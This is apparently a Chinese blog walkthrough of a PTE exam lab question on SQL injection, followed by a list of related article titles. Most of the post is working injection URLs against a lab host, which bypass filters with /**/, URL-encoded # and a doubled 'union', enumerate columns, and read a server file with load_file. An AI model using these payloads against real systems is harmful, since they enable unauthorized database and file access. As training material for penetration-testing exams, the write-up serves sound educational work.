当前位置: 首页 > news >正文

PTE考试解析

Pte 考试题目

  1. 注入漏洞

空格被过滤

7969ca3861904d8fb01be06ce65abb0d.png

用/**/代替空格,发现#被过滤

569839e071f14312aac40977ddfe60b9.png

对#进行url编码为%23

87117733b39b4689b827eca82c12c231.png

输入构造好的payload

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=1%23

7f435ce13af847309671d78c9e23181d.png

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2%23

68fe4a03cf9b4d39a2536b765ceb031b.png

输入order by 1  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/1%23

a96847e65e3844e3b94debff6ee39caf.png

输入order by 2  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/2%23

7aac062200cf4746841232eed4b2bd53.png

输入order by 3  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/3%23

45ab7b7f140340d0a55fcde90a27e506.png

输入order by 4  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/4%23

6c135326e5d845a2869812ddde059840.png

输入order by 5  出现错误,说明字段只存在4

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/5%23

0485062dd0574e8abb3074f8811528dd.png

输入union select 1,2,3,4  union被过滤采用双写绕过

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/union/**/select/**/1,2,3,4%23

f5e13f938c944beb908bea92fe94dd73.png

union被过滤采用双写绕过  没有显示出来字段号

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/ununionion/**/select/**/1,2,3,4%23

db344c640d644a46a252856c3958e297.png

采用and 和 or 测试

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,3,4%23

2.3.4有显示

d7417f6e489445419cb4ae8657b0b49d.png

 

读文件使用load_file根据提示读取这个文件load_file(%27/tmp/360/key%27),进行尝试

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,load_file(%27/tmp/360/key%27),3,4%23


92f5fa155ae542d89405909a61e2d925.png​http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,load_file(%27/tmp/360/key%27),4%23

38bbf39130354c07b11964d3017f1842.png

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,3,load_file(%27/tmp/360/key%27)%23

34b9a05586ee403d8b1e0d6460ca9a71.png

 

http://www.lryc.cn/news/191529.html

相关文章:

  • UE4和C++ 开发-UE4怎么删除C++类
  • 基于图像识别的迁移学习之一
  • k8s使用
  • HTML图片标签(2) HTML5+CSS3+移动web 前端开发入门笔记(三)
  • jwttoken+redis+springsecurity
  • asp.net会议预约管理系统VS开发sqlserver数据库web结构c#编程Microsoft Visual Studio
  • 十六、【橡皮擦工具组】
  • BAT学习——计算当前路径下指定格式文件的MD5值,将文件名与MD5值写入文本
  • 排序算法(stable_sort(), sort())
  • 【atoi函数详解】
  • 字符串左旋 与 字符串旋转结果
  • 真人现在猫鼠躲猫猫游戏搭建流程:专业思考与深度思考
  • 计算机导论实验——Linux基础入门
  • 服务运营 |摘要:学术+业界-近期前沿运筹医疗合作精选
  • 基于Dockerfile创建镜像
  • 架构实战关键知识点
  • M1Mac开启x86_64命令行archlinux虚拟机的最佳实践(qemu)
  • 深度神经网络压缩与加速技术
  • 系统架构设计:11 论湖仓一体架构及其应用
  • Linux系统编程_文件编程第1天:打开、写入、读取、关闭文件等编程
  • scapy构造ND报文
  • c++设计模式之单例设计模式
  • App自动化测试环境搭建
  • win10搭建gtest测试环境+vs2019
  • 【代码随想录】算法训练营 第二天 第一章 数组 Part 2
  • 在深度学习中,累计不同批次的损失估计总体损失
  • 论文导读|八月下旬Operations Research文章精选:定价问题专题
  • (三)Apache log4net™ 手册 -演示
  • VScode远程root权限调试
  • 【ARM CoreLink 系列 7 -- TZC-400控制器简介】